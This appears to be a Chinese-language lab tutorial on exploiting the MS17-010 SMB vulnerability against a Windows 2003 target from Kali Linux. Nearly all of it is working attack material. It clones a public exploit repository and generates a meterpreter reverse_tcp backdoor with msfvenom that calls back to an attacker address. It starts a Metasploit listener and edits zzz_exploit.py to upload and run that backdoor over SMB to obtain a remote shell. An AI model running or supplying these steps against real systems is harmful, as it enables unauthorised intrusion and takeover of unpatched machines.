测试环境：

攻击机为kali2016.2的虚拟机,目标靶机为：windows2003(x86)

1.下载ms17-010的利用脚本：

git clone https://github.com/worawit/MS17-010/

2.利用check.exp来检查目标靶机的可用管道名：这里目标管道名为：netlogon

python checker.py  192.168.99.249

3.在kali上生成一个msf的后门exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.86  LPORT=3333  -f  exe  -o  /opt/shell.exe

4.生成一个监听msf的反弹shell:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 3333
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > exploit  -j

5.修改zzz_exploit.py代码

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe')
    service_exec(conn, r'cmd /c  c:\\shell.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."

5.执行利用程序zzz_exploit.py

python zzz_exploit.py  192.168.99.249  netlogon

6.最后可用看到msf成功反弹出目标靶机的shell: